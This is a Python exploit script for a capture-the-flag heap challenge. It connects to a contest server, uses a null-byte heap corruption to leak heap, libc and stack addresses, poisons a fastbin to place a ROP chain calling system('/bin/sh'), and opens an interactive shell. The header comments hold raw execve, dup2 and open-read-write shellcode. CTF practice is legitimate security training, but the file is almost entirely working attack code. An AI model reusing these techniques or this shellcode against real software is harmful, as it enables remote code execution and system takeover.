import sys | |
sys.path.append("/home/athos/ctf/form") | |
from customlibpwn import * | |
global s | |
#def write_got(system,got_addr,n): | |
#def virtual_chunk(save_addr,bit=32) | |
#64bit fmt stack/bit + 6 | |
#open-read-write flag 32bit: hflag[H1\xf6VSH\x89\xe7j\x02X\x0f\x05P_U^jAZH1\xc0\x0f\x05H1\xc0H1\xffH\xff\xc7H\xff\xc0\x0f\x05 | |
#32 system=0x468f0 ; binsh=0x17dbc5 | |
#64 system=0x46640 ; binsh=0x17ccdb | |
#binsh64="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" | |
#binsh="\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80" | |
#sys_dup="\x31\xc9\x6a\x04\x5b\x6a\x3f\x58\xcd\x80\xfe\xc1\x80\xf9\x03\x75\xf4" | |
####################################################### | |
# DEBUG PEDA | |
####################################################### | |
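# Debug helper files consumed by a PEDA/gdb session (see the "DEBUG PEDA"
# banner above).
# NOTE: this module-level name `struct` shadows the stdlib `struct` module for
# the rest of the file; p()/u() below must therefore import from the module
# inside their own scope instead of relying on the global name.
struct = """
struct_book
{
_DWORD protect;
char title;
32 meepwn;
_DWORD book_size;
char *content;
};
"""
# `with` closes (and flushes) the handle even if the write raises; the
# original open/write/close triple leaked the handle on error.
with open("peda-debug", "w") as f:
    f.write(struct)

# _int_free offsets noted while debugging (kept for reference):
#0x7F0C6 _int_free+422 checkback
#0x7F11B _int_free+507 checknext
#0x7F282 _int_free+507 checknext
# Alternative breakpoint set, kept as a comment instead of a no-op bare
# string literal (it was never written anywhere):
#   b*_int_free
#   b*_int_free+422
#   b*_int_free+507
#   b*_int_free+481
#   b*_int_free+866
debug = """
b*fgets+244
b*0x400DD9
b*0x4010E6
b*0x400D6B
"""
filename = ""  # unused in this file; kept because it is a module-level name
with open("peda-cmd", "w") as f:
    #f.write("source /home/athos/ctf/form/gdbheapload")
    f.write(debug)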
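def p(m):
    """Pack the integer *m* as a little-endian unsigned 64-bit value.

    The stdlib import is deliberately local: the module-level name `struct`
    is rebound to a text blob earlier in this file, and `pack` otherwise only
    reaches this scope through `from customlibpwn import *` (assumed to be a
    re-export of struct.pack, given the "<Q" format).

    Raises:
        struct.error: if m is negative or does not fit in 64 bits.
    """
    from struct import pack as _pack
    return _pack("<Q", m)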
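def u(m):
    """Unpack the 8-byte buffer *m* as a little-endian unsigned 64-bit int.

    Mirrors p(); the stdlib import is local for the same reason (the global
    name `struct` is shadowed by a string in this file).

    Raises:
        struct.error: unless len(m) is exactly 8.
    """
    from struct import unpack as _unpack
    return _unpack("<Q", m)[0]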
######################################################## | |
# PWN! PWN! PWN! | |
######################################################## | |
def add_book(size,title,content):
    """Drive menu option 1 ("add book") end to end.

    Answers the size/title/content prompts with the given values, accepts
    the "Protect this book? (y/N)" question with "y", and consumes the next
    "$>" prompt so the caller is back at the menu.  send/recvu come from
    customlibpwn; every reply is newline-terminated.
    """
    dialogue = (
        ("Enter book size:", str(size)),
        ("Enter book title:", title),
        ("Enter book content:", content),
        ("Protect this book? (y/N)", "y"),
    )
    send("1\n")
    for prompt, reply in dialogue:
        recvu(prompt)
        send(reply + "\n")
    recvu("$>")
def del_book(id):
    """Drive menu option 2 ("delete book") for book number *id*.

    Unlike add_book this does not wait for the following "$>" prompt; a
    caller that needs to be back at the menu consumes it itself.  The
    parameter name shadows the builtin id() but is kept for call
    compatibility.
    """
    menu_choice, book_id = "2\n", str(id) + "\n"
    send(menu_choice)
    recvu("Enter book id:")
    send(book_id)
def doexploit():
    """Run the whole chain against the remote service, staged as the inline comments label it.

    Connects (a localhost alternative is kept commented out), unlocks menu
    option 5 with a pass phrase, then reads a heap, a libc and a stack
    address back through book 2's "Content:" output, and finally places a
    short ROP chain on the stack before handing over to telnet().
    send/recvu/telnet come from customlibpwn and are never passed `s`, so
    they presumably use the connection sock() registers internally — confirm
    in that library.  Every numeric offset below is tied to one specific
    binary/libc build.  This file is Python 2 (print statements, `L` suffix).
    """
    # local binding; the module-level `global s` has no effect on it
    s=sock("lab04.matesctf.org",1337)
    #s=sock("localhost",4000)
    recvu("$>")
    send("5\n")
    recvu("Enter pass phrase:")
    send("\xbbDhQ\xb8\xae"+"\n")
    recvu("$>")
    add_book(0x100,"A"*30,"1"*0x90)
    add_book(0x30,"B"*30,"2"*0x20)
    add_book(0x20,"C"*30,"3"*0x10)
    #leak heap
    del_book(1)
    #presize chunk_size protect title size pointer_heap
    payload = "X"*0x100+p(0x110)+p(0x41)+"\x01\x00\x00\x00"+"K"*31+"AAAA" #XXXXXX
    add_book(0x1f0,"A"*32,payload)
    send("3\n")
    recvu("Enter book id:")
    send("2\n")
    leak=recvu("$>")
    d=leak.find("flag")
    # NOTE(review): find() returns -1 when the marker is absent; the slice
    # below would then quietly read the wrong bytes instead of failing loudly
    # (same for the two "Content:" lookups further down).
    heapleak = u(leak[d+0x24:d+0x2c])
    heapbase = heapleak - 0x290
    #leak libc
    # address whose 8 bytes are read back through book 2 (printed as "leak fopen")
    fopen=0x6020A0
    del_book(1)
    #presize chunk_size protect title size pointer_heap
    payload = "X"*0x100+p(0x110)+p(0x41)+"\x01\x00\x00\x00"+"K"*32+"\x00\x01\x00\x00" + p(fopen)
    add_book(0x1f0,"A"*32,payload)
    send("3\n")
    recvu("Enter book id:")
    send("2\n")
    leak=recvu("$>")
    d = leak.find("Content:")
    leak = leak[d+9:d+17]
    libc=u(leak)
    #dtors = baselibc + 0x5e26f0L
    #baselibc = libc - 0x6e4e0
    #system =baselibc + 0x46640
    #binsh = baselibc + 0x17ccdb
    # offsets for the remote libc build; the commented set just above is the
    # superseded guess (it matches the "#64 system=0x46640" header note).
    baselibc = libc - 0x6e410
    system =baselibc + 0x46590
    binsh = baselibc + 0x17c8c3
    # Python 2 long literal; only printed — its consumer is the FAIL block below
    tls_dtor_list = baselibc + 0x5e26f0L
    print "heapbase %s "%hex(heapbase)
    print "leak fopen %s"%hex(libc)
    print "baseblibc %s"%hex(baselibc)
    print "system %s"%hex(system)
    print "binsh %s"%hex(binsh)
    print "tls_dtor_list %s"%hex(tls_dtor_list)
    ###############################FAIL############################################################
    #create fake pchunk and remove book id=2,consolidate forward backward => write dtors
    #del_book(1)
    # #presize chunk_size protect title size pointer_heap
    #chunk_addr = heapbase + 0x160
    #callers_addr = heapbase + 0x50
    #print "free chunk %s"%hex(chunk_addr)
    #print "callers %s"%hex(callers_addr)
    #(tls_dtor_list-X*5)+X*5 = &(system | binsh ...)= callers_addr
    #P->fd_nextsize->bk_nextsize = P->bk_nextsize
    #chunk = p(0x30) + p(0x90) + "K"*40 + p(heapbase+0x2b0) + "D"*(0x90-64) + p(0)+p(0x11)+p(0)+p(0)
    #p_chunk_addr = chunk_addr - 0x40
    #p_chunk = p(0) + p(0x400) + p(p_chunk_addr)+p(p_chunk_addr)+p(tls_dtor_list-0x40)+p(callers_addr)
    #payload = p(system)+p(binsh)+(chunk_addr-callers_addr-0x50)*"X"+ p_chunk + chunk
    #add_book(0x1f0,"A"*32,payload)
    #send("2\n")
    #recvu("Enter book id:")
    #raw_input(">>>")
    #send("2\n")
    #recvu("$>")
    ##############################################################################################
    #leak stack
    #p_leakstack = baselibc + 0x5c9a40L
    p_leakstack = baselibc + 0x3c14a0L
    del_book(1)
    #presize chunk_size protect title size pointer_heap
    payload = "X"*0x100+p(0x110)+p(0x41)+"\x01\x00\x00\x00"+"K"*32+"\x00\x01\x00\x00" + p(p_leakstack) #XXXXXX
    add_book(0x1f0,"A"*32,payload)
    send("3\n")
    recvu("Enter book id:")
    send("2\n")
    leak=recvu("$>")
    d=leak.find("Content:\n")
    stack = u(leak[d+9:d+17])
    print "leakstack: ",hex(stack)
    #fake fastbin fd = stackaddr ; malloc fastbin(stack) and write to stack
    del_book(1)
    #presize chunk_size protect title size pointer_heap
    payload = "X"*0x100+p(0x110)+p(0x41)+"\x01\x00\x00\x00"+"K"*32+"\x00\x01\x00\x00" + p(heapbase+0x1a0) #XXXXXX
    #write to stack
    addr_stack = stack-0x156-8
    add_book(0x1f0,"A"*32,payload)
    del_book(2)
    del_book(1)
    #fake fastbin fd
    payload = "X"*0x100+p(0x110)+p(0x40)+p(addr_stack)
    add_book(0x1f0,"A"*32,payload)
    #malloc fastbin,write rop to stack
    # presumably a pop-rdi;ret gadget in the target binary (named so; not verifiable here)
    prdiret = 0x401243
    rop = "A"*(0x30-34)+p(prdiret)+p(binsh)+ p(system)
    # same prompt sequence as add_book() but without answering the protect
    # question or waiting for "$>", since control is handed to telnet() next
    send("1\n")
    recvu("Enter book size:")
    send(str(0x30)+"\n")
    recvu("Enter book title:")
    send("A"*30+"\n")
    recvu("Enter book content:")
    send(rop+"\n")
    print "shell>> "
    # telnet() presumably runs an interactive session and returns when it ends
    telnet()
    s.close()
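# Entry point: run the chain only when this file is executed directly, so
# importing it (e.g. to reuse p()/u()/add_book()) does not open a connection.
if __name__ == "__main__":
    doexploit()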
# flag :matesctf{null byte corruption} |